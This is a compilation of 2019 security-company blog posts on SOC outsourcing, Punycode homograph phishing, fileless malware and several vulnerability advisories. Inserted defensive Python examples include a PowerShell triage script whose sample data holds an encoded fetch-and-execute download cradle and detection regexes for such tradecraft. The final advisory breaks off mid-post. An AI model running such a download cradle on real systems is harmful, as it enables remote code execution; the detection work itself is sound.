SOC – what is it and why do you need it?
Cyberon Security, 10 September 2019. Source: https://cyberonsecurity.com/2019/09/10/soc-what-is-it-and-why-do-you-need-it/

A security operations center (SOC) is a centralized function that deals with an organization's security issues at a technical level. A team of professionals with expertise in information technology and information security is responsible for monitoring and improving the organization's security posture while preventing, detecting, analyzing and responding to information security incidents.

It is made up of a dedicated team of security analysts who work together to monitor for and shut down security threats, sized and staffed according to the company and its requirements. It may also include team members with specific skills in digital forensic analysis, cryptanalysis, malware reverse engineering and more.

Security operations teams are charged with monitoring and protecting many assets, such as intellectual property, personnel data, business systems, and brand integrity. Consumers and employees alike want to know their information will be safe once they offer it to their company of choice. Taking strict measures to prevent data loss is one of the best ways to improve and maintain brand integrity in the long run.

Forming a SOC has become more important for organizations as security breaches are on the rise and the cost associated with data loss is often high. An effective SOC not only helps to minimize the cost of a data breach or an attack by responding to intrusions quickly, but also by constantly improving detection and prevention practices.

A SOC's tooling, usually centred on a SIEM (Security Information and Event Management) system, can include dozens of tools, data sources and processes to track and maintain security, such as:

  • Data correlation from network discovery (data flows, telemetry, packets, syslog, etc.)
  • Firewalls and antivirus detection
  • Cyber threat intelligence
  • Vulnerability and penetration tests
  • Website assessment
  • Database scanners
  • Intrusion detection systems (IDS)
  • Intrusion prevention systems (IPS)
  • Log management systems
  • Governance and compliance systems

There are a few standard models that SOCs typically fit into, from internally centralized structures to those that run remotely. Internal SOC, internal virtual SOC, co-managed SOC, command SOC and fusion SOC are some of them, but the outsourced virtual SOC is a trending and popular choice for a number of reasons. Here are a few reasons why you might outsource your SOC/SIEM.

Finding and retaining a talented SIEM/SOC team is expensive.

Deploying a SIEM and SOC in-house requires you to hire new employees who are fully up to date with the security industry, usually because your current team doesn't have much experience in the InfoSec area. Unfortunately, finding a single talented person to address all SIEM/SOC related issues can be a complete nightmare. Even if you opt to hire a group of security experts, it will be difficult to keep them in-house because of the high cost of their salaries. Although security is important, most organizations have a limited budget, and outsourcing the SIEM/SOC is a good bet.

Outsourcing lowers the risk of conflict of interest between departments

Your organization’s departments know the expectations and implications of outsourced SIEM and SOC beforehand. These include the top-level management and financing departments. Therefore, it will be easy to project future requirements for the new service including budgeting.

Contrary to this, a locally deployed SIEM is dynamic in nature as the department goes through a learning curve. As your new security team masters the field, its demands could squeeze the other departments, and this might lead to conflicts of interest between units.

A good example is when the security team insists on purchasing costly new technology while the company is strapped for cash. Failing to meet the team's requirements could leave the SOC incomplete, which in turn could leave it, and the organization, open to compromise.

Benefit from trends and detections across other customers

An outsourced SOC benefits from services that are optimized using the trends and detections seen across the provider's other customers. Designing your own in-house SIEM means re-inventing the wheel, and it is extremely hard and expensive to even come close to the level that a good, experienced MSSP provides.

Why would you duplicate a service that has already been built and optimized by experienced security engineers? Furthermore, since a local security center relies on a limited set of data, it cannot get the most out of intrusion detection.

Enhancing efficiency in order to concentrate on your primary business

Your goal in a business is to get more customers and increase profitability while reducing costs at the same time. Have you ever asked yourself whether you are getting enough time to concentrate on your core business? If you haven’t, it’s time to change your investment strategies.

Engaging your local staff with SOC related tasks makes them less productive at their actual jobs: they have to dedicate a certain amount of time to security matters and leave their primary focus. You will still be paying their salaries, but your overall business efficiency will be lower.

Why not offload that burden to a reputable MSSP? This ensures that your employees are tasked with duties inside the scope of your business, which improves productivity considerably and lets your company make better use of its talent. Your employees gain experience when working on specific projects without distraction.

Scalability and flexibility

An MSSP provides services based on features or service levels. For example, a SOC may offer basic, advanced and professional packages, in order to cater for businesses of different sizes.

For instance, a start-up company may require only a single security expert working for a few hours a day. When you outsource the service, your MSSP pools your needs with those of others to staff a full-time team. You can later scale up to another plan as your business grows.

This gives flexibility, as you only pay for what you require. The same model is used by web hosts: they offer shared hosting for start-ups, virtual private servers for mid-sized companies and dedicated bare-metal servers for large companies.

Accessing more threat intelligence

An MSSP has a large volume of threat data, and the good news is that it can be turned into something actionable. For instance, if there is a new vulnerability or a possible exploit affecting your servers, the MSSP's intelligence will recommend a way to patch your systems. Sometimes they may even suggest new ways to mitigate possible losses, which is just what your business needs.

MSSP intelligence is more focused and leads to proper insights that are useful for your security challenges. Also, intelligence collected over time helps build better detections for your threat surface. Security threats are agile, so your SOC must stay up to date on security intelligence to continuously improve detection and defense. If your team's resources are concentrated on other priorities, it may be wise to leverage an MSSP to manage your SOC.

Cyberon has its own SOC service named CENTRY which is designed to meet your needs regardless of size and complexity. Our solution is purely powered by open source which makes it dynamic and independent of your hardware, software or other security systems. We integrate with everything and everyone, totally seamless in your environment. Get notified proactively and reactively on potential threats by security professionals, guiding or solving the issues for you.

Punycode Attacks
Cyberon Security, 21 August 2019. Source: https://cyberonsecurity.com/2019/08/21/punycode-attacks/

How and Why

The original Internet was ASCII only, which isn't really surprising, as it was built in the United States, and English is a language that can be written entirely in characters from the ASCII set.[1] Punycode is an encoding for representing text that can't be written in ASCII (American Standard Code for Information Interchange), such as words in the Greek, Armenian, Cyrillic or Chinese scripts, using only ASCII characters.

This conversion is needed in DNS (Domain Name System), which maps domain names to IP addresses, because host names are restricted to a small subset of ASCII.

Using this encoding, internationalized domain names (IDNs), which use non-ASCII characters, can be represented using only the letters A to Z, the digits 0 to 9 and the hyphen character.

Punycode was created so that languages with a wider set of characters could also use the DNS. Basically, Punycode is an encoding method (not encryption: anyone can reverse it) that converts the Unicode characters used by IDNs into ASCII characters, with the prefix xn-- marking an encoded label.

What has changed

Years ago, ICANN allowed Unicode characters to be included in web domains, and it didn't take much time to realize that this decision was going to cause problems, as characters from different scripts can be confused with one another because they look the same when rendered in the browser.

Some of the letters in the Roman alphabet are the same shape as letters in the Greek, Cyrillic and other alphabets. Examples are: the letters I, E, A, Y, T, O and N.

All of us check for the padlock when browsing, especially when purchasing something or doing banking, because it tells us that the site uses TLS and no one will be able to eavesdrop on the data we submit. But the padlock only proves that the connection is encrypted to whoever holds a certificate for the domain shown in the address bar, and an attacker can obtain a valid certificate for a look-alike domain they own. Using this method an attacker can display the padlock, imitate a legitimate URL, and obtain a victim's credentials or sensitive information very easily.

To make this work at all, the IETF standardized Punycode (RFC 3492) as the way actual domain registrations are stored, representing Unicode within the limited character subset of ASCII used for Internet host names. The idea was that browsers would read the Punycode form of the URL and then transform it into displayable Unicode characters inside the browser.[4] Modern browsers have also introduced built-in display policies that render a URL in its Punycode form instead of Unicode when the label looks suspicious.

The dangers of punycode

But researchers have found that if every character of a domain label comes from one non-Latin script, some browsers will render it in that script rather than in Punycode. This is the loophole that makes homograph attacks possible: cybercriminals register domains made entirely of foreign look-alike characters which, when rendered, look like well-known English URLs.

Try it yourself

Test it in your own browser. Copy and paste xn--80ak6aa92e.com into the address bar of your browser and press ENTER. [5]

If your browser displays the address as apple.com (the label actually decodes to the Cyrillic string аррӏе, in which every letter is a look-alike of a Latin one) and shows a certificate for it, your browser is vulnerable to this homograph attack. Keep your browser up to date, as these defenses are shipped in security updates.
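The conversion and the check described above, as an added example in Python (not code from the original post). It uses only the standard library: the punycode codec does the per-label RFC 3492 encoding, and unicodedata gives each character's script. The LOOKALIKES table is a small hand-written subset of confusable pairs, an assumption for the demo rather than the full Unicode confusables list; the mixed-script rule is the same idea browsers use when deciding to fall back to the Punycode form.

```python
"""Punycode round-trip plus a homograph check (added example, standard library only)."""
import unicodedata

ACE_PREFIX = "xn--"  # marks a Punycode-encoded label (RFC 3490)

# Assumption: a hand-picked subset of confusable characters, enough for the demo.
LOOKALIKES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u04cf": "l",  # CYRILLIC SMALL LETTER PALOCHKA
    "\u03b1": "a",  # GREEK SMALL LETTER ALPHA
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
}


def to_ascii(domain):
    """What gets registered and sent over DNS: Punycode-encode every non-ASCII label."""
    labels = []
    for label in domain.split("."):
        if label.isascii():
            labels.append(label)
        else:
            labels.append(ACE_PREFIX + label.encode("punycode").decode("ascii"))
    return ".".join(labels)


def to_unicode(domain):
    """What the browser shows if it renders IDNs: decode every xn-- label."""
    labels = []
    for label in domain.split("."):
        if label.lower().startswith(ACE_PREFIX):
            labels.append(label[len(ACE_PREFIX):].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


def scripts_of(label):
    """Scripts used in a label, taken from the first word of each character's Unicode name."""
    found = set()
    for ch in label:
        if ch in "-0123456789":
            continue  # digits and hyphen belong to no script
        found.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return found


def latin_skeleton(domain):
    """Replace each known look-alike with the Latin letter it imitates."""
    return "".join(LOOKALIKES.get(ch, ch) for ch in domain)


def homograph_verdict(domain):
    """Return (suspicious, reason) for a domain given in Unicode form."""
    for label in domain.split("."):
        used = scripts_of(label)
        if len(used) > 1:  # e.g. Latin 'p' next to Cyrillic 'а'
            return True, "label %r mixes scripts %s" % (label, sorted(used))
    skeleton = latin_skeleton(domain)
    if skeleton != domain and skeleton.isascii():  # whole name is look-alikes
        return True, "every non-ASCII character imitates Latin; looks like %r" % skeleton
    return False, "no look-alike characters found"


if __name__ == "__main__":
    shown = to_unicode("xn--80ak6aa92e.com")  # the address from the test above
    print(shown, "->", to_ascii(shown))
    print(homograph_verdict(shown))
    print(homograph_verdict("p\u0430ypal.com"))  # Latin plus one Cyrillic 'а'
    print(homograph_verdict("apple.com"))
```

Running it prints the Cyrillic string аррӏе.com, re-encodes it to exactly xn--80ak6aa92e.com, and flags it as all look-alikes; a genuine single-script name such as a real Cyrillic domain passes both rules, which is why browsers need the confusables data rather than a plain "non-ASCII means bad" rule.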

Although this particular attack may not directly impact a large number of individuals or organizations, it does serve as two important reminders. First, that there’s a lot of very intelligent people who are quite capable of creating new phishing and malware attacks that will successfully penetrate our systems, and that will never change. Second, organizations must aggressively and continuously upgrade their defenses to thwart the advanced attacks that will surely come.[6]

  1. https://www.symantec.com/connect/blogs/bad-guys-using-internationalized-domain-names-idns
  2. https://randed.com/punycode-attack/?lang=en
  3. https://securityintelligence.com/beware-of-the-latest-punycode-attacks/
  4. https://fraudwatchinternational.com/expert-explanations/punycode-phishing-part-1/
  5. https://www.xudongz.com/blog/2017/idn-phishing/
  6. https://www.lastline.com/blog/punycode-cyberattack/

Fileless Malware
Cyberon Security, 6 August 2019. Source: https://cyberonsecurity.com/2019/08/06/fileless-malware/

Fileless malware is a type of malicious software that uses legitimate programs to infect a computer. It does not rely on its own executable files and leaves little or no footprint on disk, making it challenging to detect and remove. Fileless malware emerged in 2017 as a mainstream type of attack, but many of these attack methods have been around for a while. Fileless malware is sometimes considered synonymous with in-memory malware, as both perform their core functionality without writing data to disk during the lifetime of their operation.

Unlike traditional malware, fileless malware attacks do not need any executable file or software to be installed on the victim's device. In other words, Windows is turned against itself.

Fileless malware attacks involve taking default Windows tools, especially PowerShell and Windows Management Instrumentation (WMI), and using them for malicious actions such as moving laterally to other machines.

PowerShell and WMI are pre-installed on every Windows machine and are built for automating tasks. PowerShell, for example, can call into .NET and the Windows API directly.

Using legitimate programs makes these attacks hard to detect for most security products and even for skilled security analysts. The reason is simple: since PowerShell and WMI are legitimate programs, any command they execute tends to be assumed legitimate as well, unless the commands themselves are logged and inspected (for example with PowerShell script block logging and process command-line auditing).

The initial infection usually involves tricking the user into opening an infected file or visiting a malicious website. Although this is typical of malware attacks, the payload will not create files on the device's hard drive but will instead reside only in memory.

The next stage of the attack varies but often includes creating entries in the device's registry for persistence, or launching commonly used processes such as PowerShell or Windows Management Instrumentation (WMI) to run the payload.

Afterwards, the infected machine may attempt to propagate onto other connected devices, attempt to download additional malware on the infected device, and attempt to download and execute scripts.
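A detection-side illustration of the points above, added here as an example and not taken from the original post or from any vendor's signatures. It takes process-creation command lines (the sample events are constructed for this demo, in the shape of the CommandLine field of a Sysmon event 1 or Windows 4688 record), decodes the -EncodedCommand argument that fileless droppers typically use (Base64 of UTF-16LE text), and scores the result against a hand-picked set of indicators: download cradles, in-memory execution, hidden windows, execution-policy bypass and WMI process creation. The indicator list and the threshold are assumptions; a real deployment tunes them against the baseline of legitimate administrative scripting.

```python
"""Triage PowerShell/WMI command lines for fileless-malware tradecraft (added example)."""
import base64
import re

# Constructed sample events: the CommandLine field of a process-creation record
# (Sysmon event 1 / Windows 4688 with command-line auditing enabled).
SAMPLE_EVENTS = [
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"',
    # a typical in-memory download cradle, hidden behind -EncodedCommand
    "powershell.exe -nop -w hidden -ep bypass -enc " + base64.b64encode(
        'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/a.ps1")'
        .encode("utf-16le")).decode("ascii"),
    'wmic.exe process call create "powershell -w hidden -c Start-Sleep 1"',
    "notepad.exe C:\\notes.txt",
]

# Assumption: a small hand-picked indicator set, not a vendor signature database.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|ExecutionPolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "wmi_process_create": re.compile(r"Win32_Process|Invoke-WmiMethod|process\s+call\s+create", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Score one command line; the decoded payload is scanned together with the wrapper."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "score": len(hits)}


def triage_events(events, threshold=2):
    """Keep only events whose indicator count reaches the threshold (assumed: 2)."""
    return [t for t in map(triage, events) if t["score"] >= threshold]


if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(alert["score"], alert["indicators"])
        if alert["decoded"]:
            print("   decoded:", alert["decoded"])
```

The benign -NoProfile listing scores one indicator and stays below the threshold, the encoded cradle scores six once its payload is decoded, and the wmic launch scores two; decoding before matching is the point, since a signature that only looks at the visible command line sees nothing but Base64.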

Potential Infection Vectors

  1. Physical transfer
    Attack vector: A user connects an infected device or media into a device.
  2. Social Engineering (Phishing)
    1. Infected links
      Attack vector: A user interacts with a link to a malicious website in an email.
    2. Infected attachments
      Attack vector: A user opens a malicious attachment (for example, a document carrying a macro) that launches a script.
  3. Web application
    Attack vector: A malicious actor leverages a weakness in a website to inject and execute code on any user that happens to visit the website.

Potential Mitigations

  1. Patch and upgrade management, including staying up to date with vendor issued security advisories and application releases.
  2. Architect a layered IT defense environment including hardening of end points and disabling non-essential applications and services.
  3. Strong user awareness including encouraging users to report suspicious activity and implementing cyber security training.
  4. Log management, including PowerShell script block logging and command-line auditing, regular reviews of system and server logs, and regular audits.

Public servers make you a target
Cyberon Security, 1 August 2019. Source: https://cyberonsecurity.com/2019/08/01/public-servers-makes-you-a-target/

Different servers do different jobs

Servers do everything from serving email and video to protecting internal networks and hosting web sites: mail servers, web servers, application servers, FTP servers, collaboration servers, proxy servers and so on.

Exposing these servers to the Internet without following security best practices is a poor choice, as they will be frequently targeted by attackers for various reasons and their confidentiality, integrity and availability could be lost.

As a result of such intrusions an organization can lose reputation, customers, time, money and data. So it is strongly advised to follow security best practices, have a security plan and a policy for implementing it, and monitor its effectiveness and update it as needed.

How to secure your servers

Before setting up a new server it is paramount to have a good deployment plan, as it is hard to address security issues after implementation. A range of security controls available from firewalls or dedicated systems can and should be put in place:

  • Intrusion Detection Systems (IDS): Analyze and monitor network traffic for signs that indicate attackers are using a known cyberthreat to infiltrate or steal data from your network. IDS systems compare the current network activity to a known threat database to detect several kinds of behaviors like security policy violations, malware, and port scanners.
  • Intrusion Prevention Systems (IPS): An IPS lives in the same area of the network as a firewall, between the outside world and the internal network. It proactively drops network traffic, based on a security profile, when a packet represents a known security threat.
  • Segmentation: Traditional networks are designed to be “crunchy on the outside and soft on the inside.” If someone gets through that perimeter (the crunchy surface), they’ll find a flat network infrastructure (the soft insides). Because most detective tools are externally focused, and not looking at what’s going on inside, the unwelcomed guest will have free range to perpetrate an attack. It’s also an obstacle for insiders because you can isolate sensitive data and systems from “curious” insiders.
  • Network Access Control (NAC): A NAC system can deny network access to noncompliant devices, place them in a quarantined area, or give them only restricted access to computing resources, thus keeping insecure nodes from infecting the network.
  • Proxy: A proxy can hide the internal network structure of a company, typically together with network address translation, which helps the security of the internal network: outside parties only see the proxy's address, not the individual machines and users behind it.
  • WAF: A web application firewall (WAF) is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) and SQL injection.

While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application too.

Larger companies and high-value targets should also consider a DDoS mitigation service. These are usually high-cost solutions, but they protect against targeted DDoS attacks that can take down your servers and your Internet connection.

How do you really know you are under attack?

Cyber criminals are always on the lookout for easy targets and their preferred method is stealth, which means you have to monitor continuously for any irregularities. This is usually a full-time job, as you need to analyze information from a broad range of systems and act on suspicious activity. Depending on the size of your company there are several sources of relevant information: firewalls, antivirus, O365, syslog, mobile phones, password managers, routers and so on. This information needs to be sorted and sifted through in order to pick out the events connected to intruders. If you have the resources it can be done by implementing a SIEM solution that receives all the information and lets you analyze it in real time. Alternatively you can outsource to a more advanced type of SOC service, such as our own Centry solution operated by security specialists.
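The sorting and sifting described above, as an added example (not code from this or the SOC post) of what a SIEM correlation rule actually does; it serves both the tool list in the SOC post and this paragraph. Two sources are normalised into one event stream and two rules run over it: a port scan (many distinct destination ports denied from one source inside a short window) and a brute-force login that succeeded (several failures followed by an accepted login from the same source), with a success preceded by a scan escalated. The two log formats, the host names fw01 and web01, the RFC 5737 addresses and all the lines are constructed for this demo; thresholds and windows are assumptions to tune against your own baseline.

```python
"""Two-source SIEM correlation over constructed firewall and sshd logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample logs (assumed formats; RFC 5737 documentation addresses).
FIREWALL_LOG = """\
2019-08-01T11:30:01Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=21 proto=tcp
2019-08-01T11:30:01Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=23 proto=tcp
2019-08-01T11:30:02Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=25 proto=tcp
2019-08-01T11:30:02Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=445 proto=tcp
2019-08-01T11:30:03Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=3389 proto=tcp
2019-08-01T11:30:03Z fw01 DENY src=198.51.100.7 dst=203.0.113.10 dport=8080 proto=tcp
2019-08-01T11:45:10Z fw01 DENY src=192.0.2.44 dst=203.0.113.10 dport=23 proto=tcp
"""
AUTH_LOG = """\
2019-08-01T11:31:05Z web01 sshd[2231]: Failed password for root from 198.51.100.7 port 51022 ssh2
2019-08-01T11:31:08Z web01 sshd[2231]: Failed password for root from 198.51.100.7 port 51023 ssh2
2019-08-01T11:31:11Z web01 sshd[2231]: Failed password for admin from 198.51.100.7 port 51024 ssh2
2019-08-01T11:31:15Z web01 sshd[2231]: Accepted password for admin from 198.51.100.7 port 51025 ssh2
2019-08-01T11:50:00Z web01 sshd[2290]: Failed password for bob from 192.0.2.44 port 40000 ssh2
2019-08-01T11:52:00Z web01 sshd[2291]: Accepted publickey for bob from 192.0.2.44 port 40001 ssh2
"""

FW_RE = re.compile(r"^(?P<ts>\S+) \S+ DENY src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+)")
SSH_RE = re.compile(r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) \w+ for (?P<user>\S+) from (?P<src>\S+)")


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def normalise(firewall_text, auth_text):
    """Turn both raw formats into one time-ordered list of uniform event dicts."""
    events = []
    for line in firewall_text.splitlines():
        m = FW_RE.match(line)
        if m:
            events.append({"ts": parse_ts(m["ts"]), "src": m["src"],
                           "type": "fw_deny", "dport": int(m["dport"])})
    for line in auth_text.splitlines():
        m = SSH_RE.match(line)
        if m:
            events.append({"ts": parse_ts(m["ts"]), "src": m["src"], "user": m["user"],
                           "type": "auth_fail" if m["result"] == "Failed" else "auth_ok"})
    events.sort(key=lambda e: e["ts"])
    return events


def rule_port_scan(events, min_ports=5, window=timedelta(seconds=60)):
    """One source denied on at least min_ports distinct ports inside the window."""
    denies = defaultdict(list)
    for e in events:
        if e["type"] == "fw_deny":
            denies[e["src"]].append(e)
    alerts = []
    for src, evs in denies.items():
        for i, first in enumerate(evs):  # slide the window start over each deny
            ports = {x["dport"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(ports) >= min_ports:
                alerts.append({"rule": "port_scan", "src": src,
                               "ports": sorted(ports), "at": first["ts"]})
                break
    return alerts


def rule_bruteforce_success(events, min_failures=3, window=timedelta(minutes=10)):
    """At least min_failures failed logins from a source, then a success from it."""
    failures = defaultdict(list)
    alerts = []
    for e in events:
        if e["type"] == "auth_fail":
            failures[e["src"]].append(e["ts"])
        elif e["type"] == "auth_ok":
            recent = [t for t in failures[e["src"]] if e["ts"] - t <= window]
            if len(recent) >= min_failures:
                alerts.append({"rule": "bruteforce_success", "src": e["src"],
                               "user": e["user"], "failures": len(recent), "at": e["ts"]})
            failures[e["src"]].clear()  # a success resets the counter
    return alerts


def correlate(firewall_text=FIREWALL_LOG, auth_text=AUTH_LOG):
    """Run both rules and escalate a login success preceded by a scan from the same source."""
    events = normalise(firewall_text, auth_text)
    alerts = rule_port_scan(events) + rule_bruteforce_success(events)
    scanners = {a["src"] for a in alerts if a["rule"] == "port_scan"}
    for a in alerts:
        escalate = a["rule"] == "bruteforce_success" and a["src"] in scanners
        a["severity"] = "critical" if escalate else "high"
    return alerts


if __name__ == "__main__":
    for a in correlate():
        print(a["severity"].upper(), a["rule"], a["src"], a["at"].isoformat())
```

Neither source alone tells the story: the firewall sees a scan and the web server sees a login, but only the joined stream shows that 198.51.100.7 scanned and then got in as admin, while bob's single typo followed by a key-based login from 192.0.2.44 produces nothing. That join across sources is the work a SIEM, or the SOC behind it, does.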

If you are unsure on how to proceed in securing your environment, please contact us and we can help you get started or build your system from the ground up if needed.

WhatsApp Remote Code Execution (RCE) Vulnerability
Cyberon Security, 31 July 2019. Source: https://cyberonsecurity.com/2019/07/31/whatsapp-remote-code-execution-rce-vulnerability/

From Alert

Attackers could remotely install surveillance malware on smartphones by simply calling the targeted phone. The WhatsApp call doesn't even have to be answered, and the spyware erases the call logs from the device, so the victim won't be able to trace the attacker.

Description

A remote code execution vulnerability has been discovered in WhatsApp which can be exploited by sending malicious packets to a targeted phone number. It was used in the wild to compromise devices with an advanced version of the Pegasus spyware.
This is a buffer overflow vulnerability in WhatsApp's VoIP (Voice over Internet Protocol) stack. An attacker would need to call a target and send rigged Secure Real-time Transport Protocol (SRTP) packets to the phone, allowing them to use the memory flaw in WhatsApp's VoIP function to inject the spyware and take control of the device.

Affected Versions

• WhatsApp for Android prior to v2.19.134,
• WhatsApp Business for Android prior to v2.19.44,
• WhatsApp for iOS prior to v2.19.51,
• WhatsApp Business for iOS prior to v2.19.51,
• WhatsApp for Windows Phone prior to v2.18.348 and
• WhatsApp for Tizen prior to v2.18.15.

Impact

• Stealing sensitive information
• Remote code execution

Recommended actions

The patch was released on 13 May and all users are advised to upgrade to the latest version of WhatsApp as soon as possible.
This can be done by updating the app through Google Play or the App Store.

Firefox Zero-Day Vulnerability
Cyberon Security, 31 July 2019. Source: https://cyberonsecurity.com/2019/07/31/firefox-zero-day-vulnerability/

Systems Affected

  • Firefox
  • Firefox ESR

Threat Level

High

Overview

Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.[1]

Description

A type confusion vulnerability can occur when manipulating JavaScript objects due to issues in Array.pop. This can allow for an exploitable crash. We are aware of targeted attacks in the wild abusing this flaw.[2] The vulnerability identified as CVE-2019-11707 affects anyone who uses Firefox on desktop (Windows, macOS, and Linux) — whereas, Firefox for Android, iOS, and Amazon Fire TV are not affected.

Impact

The vulnerability could allow attackers to remotely execute arbitrary code on machines running vulnerable Firefox versions and take full control of them.

Solution

Mozilla has released Firefox 67.0.3 and Firefox ESR (Extended Support Release) 60.7.1 to patch the vulnerability. Apply the necessary updates and ensure you are running these versions or later.

Reference

[1] https://www.us-cert.gov/ncas/current-activity/2019/06/18/Mozilla-Releases-Security-Updates-Firefox-and-Firefox-ESR
[2] https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/
[3] https://thehackernews.com/2019/06/mozilla-firefox-patch-update.html?m=1

Disclaimer

The information provided herein is on “as is” basis, without warranty of any kind.

VLC Vulnerability – Read buffer overflow & double free
Cyberon Security, 31 July 2019. Source: https://cyberonsecurity.com/2019/07/31/vlc-vulnerability-read-buffer-overflow-double-free/

Systems Affected

  • VLC media player 3.0.6 and earlier
Summary           : Read buffer overflow & double free
Date              : June 2019
Affected versions : VLC media player 3.0.6 and earlier
ID                : VideoLAN-SA-1901
CVE reference     : CVE-2019-5439, CVE-2019-12874

Threat Level

High

Overview

A remote user can create some specially crafted avi or mkv files that, when loaded by the target user, will trigger a heap buffer overflow (read) in ReadFrame (demux/avi/avi.c), or a double free in zlib_decompress_extra() (demux/mkv/utils.cpp) respectively.[1]

Description

If you use VLC media player on your computer and haven’t updated it recently, don’t you even dare to play any untrusted, randomly downloaded video file on it. Doing so could allow hackers to remotely take full control over your computer system. That’s because VLC media player software versions prior to 3.0.7 contain two high-risk security vulnerabilities, besides many other medium- and low-severity security flaws, that could potentially lead to arbitrary code execution attacks. [2]

Impact

If successful, a malicious third party could trigger either a crash of VLC or arbitrary code execution with the privileges of the target user.

Solution

VLC media player 3.0.7 addresses the issues. This release also fixes an important security issue that could lead to code execution when playing an AAC file.

Apply the necessary updates. Ensure you are running the latest version of VLC.

Reference

[1] https://www.videolan.org/security/sa1901.html

[2] https://thehackernews.com/2019/06/vlc-media-player-hacking.html

Credits

The MKV double free vulnerability was reported by Symeon Paraschoudis from Pen Test Partners

Stored XSS in Microsoft Office SharePoint
Cyberon Security, 31 July 2019. Source: https://cyberonsecurity.com/2019/07/31/stored-xss-in-microsoft-office-sharepoint/

The post Stored XSS in Microsoft Office SharePoint appeared first on Cyberon Security.

]]>

Systems Affected

  • Microsoft SharePoint Server 2019

Summary           : Stored XSS in Microsoft Office SharePoint
Date              : June 2019
Affected versions : Microsoft SharePoint Server 2019
CVE reference     : CVE-2019-1134

Threat Level

Medium

Overview

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of user-supplied data. A remote authenticated attacker can permanently inject and execute arbitrary HTML and script code in the user’s browser in the context of the vulnerable website. [1]

Description

A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. [2]

Impact

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks.

Solution

We are currently unaware of any official solution to address this vulnerability.

Reference

[1] https://www.cybersecurity-help.cz/vdb/SB2019062801

[2] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1134

Credits

The SharePoint XSS vulnerability was reported by Huynh Phuoc Hung (@hph0var).

Disclaimer

The information provided herein is on “as is” basis, without warranty of any kind.

Microsoft Office’s Excel Attack Vector
https://cyberonsecurity.com/2019/07/31/microsoft-offices-excel-attack-vector/
Wed, 31 Jul 2019 12:18:42 +0000

SYSTEMS AFFECTED

Microsoft Office 2016 and older:

  • Excel running Power Query

THREAT LEVEL

High

OVERVIEW

A feature of Microsoft Excel called Power Query can be abused to launch a remote Dynamic Data Exchange (DDE) attack from an Excel spreadsheet and to actively control the payload through Power Query.

A feature in Microsoft Office’s Excel spreadsheet program called Power Query can be exploited to plant malware on remote systems. Researchers at Mimecast Threat Center say they have developed a proof-of-concept attack scenario and reported the vulnerability last month.

DESCRIPTION

The exploitable feature in Excel, called Power Query, allows users to embed outside data sources such as external databases or web-based data into a spreadsheet. Mimecast Threat Center has developed a technique to launch a remote Dynamic Data Exchange (DDE) attack from an Excel spreadsheet, deliver a malicious payload and actively control the payload via Power Query. Researchers say that in older versions of Microsoft Excel, such as Excel 2010, the payload is executed automatically, with no user interaction needed.

IMPACT

